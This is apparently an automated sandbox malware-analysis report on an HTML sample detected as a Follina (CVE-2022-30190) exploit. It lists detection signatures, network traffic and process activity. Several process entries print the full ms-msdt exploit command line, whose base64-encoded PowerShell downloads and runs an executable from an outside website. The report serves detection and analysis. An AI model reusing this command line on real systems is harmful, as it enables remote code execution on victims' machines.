Windows Analysis Report
blog.html

Overview

General Information

Sample Name: blog.html
Analysis ID: 654145
MD5: fef2b6879c54b532ac0700113dd4173c
SHA1: 824bfa2bbfbe11c7810f1a857ecf1d7d64fe2743
SHA256: 9d16c6ba4ec1c23f9e35c05b6e17425fdc6cf4d5a3d5ea100129b24c21d68b7d
Tags: Follinahtml
Infos:

Detection

Follina CVE-2022-30190
Score: 48
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected Microsoft Office Exploit Follina CVE-2022-30190
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
IP address seen in connection with other malware

Classification

Exploits

barindex
Source: Yara match File source: blog.html, type: SAMPLE
Source: Yara match File source: 0000000E.00000002.672988587.00000215ED760000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.673016389.00000215ED769000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.673521929.00000215ED874000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Joe Sandbox View IP Address: 239.255.255.250 239.255.255.250
Source: unknown DNS traffic detected: queries for: accounts.google.com
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49755 -> 443
Source: global traffic HTTP traffic detected: GET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=85.0.4183.121&lang=en-GB&acceptformat=crx3&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1&x=id%3Dpkedcjkdefgpdelpbcmbmeomcjbeemfm%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1 HTTP/1.1Host: clients2.google.comConnection: keep-aliveX-Goog-Update-Interactivity: fgX-Goog-Update-AppId: nmmhkkegccagdldgiimedpiccmgmieda,pkedcjkdefgpdelpbcmbmeomcjbeemfmX-Goog-Update-Updater: chromecrx-85.0.4183.121Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en-US;q=0.9,en;q=0.8
Source: pnacl_public_x86_64_pnacl_sz_nexe.0.dr, pnacl_public_x86_64_pnacl_llc_nexe.0.dr String found in binary or memory: http://llvm.org/):
Source: 3bd28c3b-f83f-4a19-82d8-e4552159d6e9.tmp.1.dr, 0d3bff7a-d9a6-438c-8117-b872b8c23851.tmp.1.dr String found in binary or memory: https://accounts.google.com
Source: craw_window.js.0.dr String found in binary or memory: https://accounts.google.com/MergeSession
Source: 3bd28c3b-f83f-4a19-82d8-e4552159d6e9.tmp.1.dr, 0d3bff7a-d9a6-438c-8117-b872b8c23851.tmp.1.dr String found in binary or memory: https://apis.google.com
Source: pnacl_public_x86_64_libpnacl_irt_shim_dummy_a.0.dr String found in binary or memory: https://chromium.googlesource.com/a/native_client/pnacl-clang.git
Source: pnacl_public_x86_64_libpnacl_irt_shim_dummy_a.0.dr String found in binary or memory: https://chromium.googlesource.com/a/native_client/pnacl-llvm.git
Source: 3bd28c3b-f83f-4a19-82d8-e4552159d6e9.tmp.1.dr, 0d3bff7a-d9a6-438c-8117-b872b8c23851.tmp.1.dr String found in binary or memory: https://clients2.google.com
Source: manifest.json1.0.dr, manifest.json.0.dr String found in binary or memory: https://clients2.google.com/service/update2/crx
Source: 3bd28c3b-f83f-4a19-82d8-e4552159d6e9.tmp.1.dr, 0d3bff7a-d9a6-438c-8117-b872b8c23851.tmp.1.dr String found in binary or memory: https://clients2.googleusercontent.com
Source: pnacl_public_x86_64_ld_nexe.0.dr String found in binary or memory: https://code.google.com/p/nativeclient/issues/entry
Source: pnacl_public_x86_64_ld_nexe.0.dr String found in binary or memory: https://code.google.com/p/nativeclient/issues/entry%s:
Source: 84e1d201-80a6-4e6e-9f8a-7dcb319e9d15.tmp.1.dr, 3bd28c3b-f83f-4a19-82d8-e4552159d6e9.tmp.1.dr, 7bb7e723-11a5-43d8-abb5-a21c25034ef8.tmp.1.dr, 0d3bff7a-d9a6-438c-8117-b872b8c23851.tmp.1.dr String found in binary or memory: https://dns.google
Source: 3bd28c3b-f83f-4a19-82d8-e4552159d6e9.tmp.1.dr, 0d3bff7a-d9a6-438c-8117-b872b8c23851.tmp.1.dr String found in binary or memory: https://fonts.googleapis.com
Source: 3bd28c3b-f83f-4a19-82d8-e4552159d6e9.tmp.1.dr, 0d3bff7a-d9a6-438c-8117-b872b8c23851.tmp.1.dr String found in binary or memory: https://fonts.gstatic.com
Source: craw_window.js.0.dr, craw_background.js.0.dr String found in binary or memory: https://github.com/google/closure-library/wiki/goog.module:-an-ES6-module-like-alternative-to-goog.p
Source: 3bd28c3b-f83f-4a19-82d8-e4552159d6e9.tmp.1.dr, 0d3bff7a-d9a6-438c-8117-b872b8c23851.tmp.1.dr String found in binary or memory: https://ogs.google.com
Source: craw_window.js.0.dr, manifest.json.0.dr String found in binary or memory: https://payments.google.com/payments/v4/js/integrator.js
Source: 3bd28c3b-f83f-4a19-82d8-e4552159d6e9.tmp.1.dr, 0d3bff7a-d9a6-438c-8117-b872b8c23851.tmp.1.dr String found in binary or memory: https://play.google.com
Source: 0d3bff7a-d9a6-438c-8117-b872b8c23851.tmp.1.dr String found in binary or memory: https://r5---sn-h0jeln7l.gvt1.com
Source: 3bd28c3b-f83f-4a19-82d8-e4552159d6e9.tmp.1.dr, 0d3bff7a-d9a6-438c-8117-b872b8c23851.tmp.1.dr String found in binary or memory: https://redirector.gvt1.com
Source: craw_window.js.0.dr, manifest.json.0.dr String found in binary or memory: https://sandbox.google.com/payments/v4/js/integrator.js
Source: 3bd28c3b-f83f-4a19-82d8-e4552159d6e9.tmp.1.dr, 0d3bff7a-d9a6-438c-8117-b872b8c23851.tmp.1.dr String found in binary or memory: https://ssl.gstatic.com
Source: craw_window.js.0.dr, craw_background.js.0.dr String found in binary or memory: https://www-googleapis-staging.sandbox.google.com
Source: 3bd28c3b-f83f-4a19-82d8-e4552159d6e9.tmp.1.dr, 0d3bff7a-d9a6-438c-8117-b872b8c23851.tmp.1.dr String found in binary or memory: https://www.google.com
Source: manifest.json.0.dr String found in binary or memory: https://www.google.com/
Source: craw_window.js.0.dr String found in binary or memory: https://www.google.com/accounts/OAuthLogin?issueuberauth=1
Source: craw_window.js.0.dr String found in binary or memory: https://www.google.com/images/cleardot.gif
Source: craw_window.js.0.dr String found in binary or memory: https://www.google.com/images/dot2.gif
Source: craw_window.js.0.dr String found in binary or memory: https://www.google.com/images/x2.gif
Source: craw_background.js.0.dr String found in binary or memory: https://www.google.com/intl/en-US/chrome/blank.html
Source: craw_window.js.0.dr, craw_background.js.0.dr, 3bd28c3b-f83f-4a19-82d8-e4552159d6e9.tmp.1.dr, 0d3bff7a-d9a6-438c-8117-b872b8c23851.tmp.1.dr String found in binary or memory: https://www.googleapis.com
Source: manifest.json.0.dr String found in binary or memory: https://www.googleapis.com/
Source: manifest.json.0.dr String found in binary or memory: https://www.googleapis.com/auth/chromewebstore
Source: manifest.json.0.dr String found in binary or memory: https://www.googleapis.com/auth/chromewebstore.readonly
Source: manifest.json.0.dr String found in binary or memory: https://www.googleapis.com/auth/sierra
Source: manifest.json.0.dr String found in binary or memory: https://www.googleapis.com/auth/sierrasandbox
Source: 3bd28c3b-f83f-4a19-82d8-e4552159d6e9.tmp.1.dr, 0d3bff7a-d9a6-438c-8117-b872b8c23851.tmp.1.dr String found in binary or memory: https://www.gstatic.com
Source: unknown HTTP traffic detected: POST /ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard HTTP/1.1Host: accounts.google.comConnection: keep-aliveContent-Length: 1Origin: https://www.google.comContent-Type: application/x-www-form-urlencodedSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en-US;q=0.9,en;q=0.8
Source: blog.html, type: SAMPLE Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-06-20
Source: blog.html, type: SAMPLE Matched rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 date = 2022-05-30, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-05-31, hash = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Local\Temp\4bb935c4-12fa-4ae6-9272-8704f42aef9e.tmp Jump to behavior
Source: C:\Windows\System32\msdt.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: classification engine Classification label: mal48.expl.winHTML@32/121@2/8
Source: unknown Process created: C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --enable-automation "C:\Users\user\Desktop\blog.html
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1528,2458455930681396657,16758854869973346526,131072 --lang=en-GB --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1948 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Windows\System32\msdt.exe "C:\Windows\system32\msdt.exe" ms-msdt:/id%20PCWDiagnostic%20/skip%20force%20/param%20%22IT_RebrowseForFile=?%20IT_LaunchMethod=ContextMenu%20IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'aXdyIGh0dHBzOi8vY29uc3VtZXJmaW5hbmNlZ3VpZGUuY29tL2Jsb2cvaW5kZXgvZ3B1cGRhdGUuZXhlIC1PdXRGaWxlIEM6XFdpbmRvd3NcVGFza3NcZ3B1cGRhdGUuZXhlOyBDOlxXaW5kb3dzXFRhc2tzXGdwdXBkYXRlLmV4ZQo='+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe%22
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1528,2458455930681396657,16758854869973346526,131072 --lang=en-GB --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1948 /prefetch:8 Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Windows\System32\msdt.exe "C:\Windows\system32\msdt.exe" ms-msdt:/id%20PCWDiagnostic%20/skip%20force%20/param%20%22IT_RebrowseForFile=?%20IT_LaunchMethod=ContextMenu%20IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'aXdyIGh0dHBzOi8vY29uc3VtZXJmaW5hbmNlZ3VpZGUuY29tL2Jsb2cvaW5kZXgvZ3B1cGRhdGUuZXhlIC1PdXRGaWxlIEM6XFdpbmRvd3NcVGFza3NcZ3B1cGRhdGUuZXhlOyBDOlxXaW5kb3dzXFRhc2tzXGdwdXBkYXRlLmV4ZQo='+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe%22 Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics\BrowserMetrics-62BBFD6F-1874.pma Jump to behavior
Source: C:\Windows\System32\msdt.exe Automated click: Next
Source: C:\Windows\System32\msdt.exe Automated click: Next
Source: C:\Windows\System32\msdt.exe Automated click: Next
Source: C:\Windows\System32\msdt.exe Automated click: Next
Source: C:\Windows\System32\msdt.exe Automated click: Next
Source: C:\Windows\System32\msdt.exe Automated click: Next
Source: C:\Windows\System32\msdt.exe Automated click: Next
Source: C:\Windows\System32\msdt.exe Automated click: Next
Source: C:\Windows\System32\msdt.exe Automated click: Next
Source: C:\Windows\System32\msdt.exe Automated click: Next
Source: C:\Windows\System32\msdt.exe Automated click: Next
Source: C:\Windows\System32\msdt.exe Automated click: Next
Source: C:\Windows\System32\msdt.exe Automated click: Next
Source: C:\Windows\System32\msdt.exe Automated click: Next
Source: C:\Windows\System32\msdt.exe Automated click: Next
Source: C:\Windows\System32\msdt.exe Automated click: Next
Source: C:\Windows\System32\msdt.exe Automated click: Next
Source: C:\Windows\System32\msdt.exe File opened: C:\Windows\system32\MSFTEDIT.DLL Jump to behavior
Source: C:\Windows\System32\msdt.exe Window / User API: threadDelayed 1850 Jump to behavior
Source: C:\Windows\System32\msdt.exe Window / User API: threadDelayed 1170 Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Windows\System32\msdt.exe "C:\Windows\system32\msdt.exe" ms-msdt:/id%20PCWDiagnostic%20/skip%20force%20/param%20%22IT_RebrowseForFile=?%20IT_LaunchMethod=ContextMenu%20IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'aXdyIGh0dHBzOi8vY29uc3VtZXJmaW5hbmNlZ3VpZGUuY29tL2Jsb2cvaW5kZXgvZ3B1cGRhdGUuZXhlIC1PdXRGaWxlIEM6XFdpbmRvd3NcVGFza3NcZ3B1cGRhdGUuZXhlOyBDOlxXaW5kb3dzXFRhc2tzXGdwdXBkYXRlLmV4ZQo='+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe%22
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Windows\System32\msdt.exe "C:\Windows\system32\msdt.exe" ms-msdt:/id%20PCWDiagnostic%20/skip%20force%20/param%20%22IT_RebrowseForFile=?%20IT_LaunchMethod=ContextMenu%20IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'aXdyIGh0dHBzOi8vY29uc3VtZXJmaW5hbmNlZ3VpZGUuY29tL2Jsb2cvaW5kZXgvZ3B1cGRhdGUuZXhlIC1PdXRGaWxlIEM6XFdpbmRvd3NcVGFza3NcZ3B1cGRhdGUuZXhlOyBDOlxXaW5kb3dzXFRhc2tzXGdwdXBkYXRlLmV4ZQo='+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe%22 Jump to behavior
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs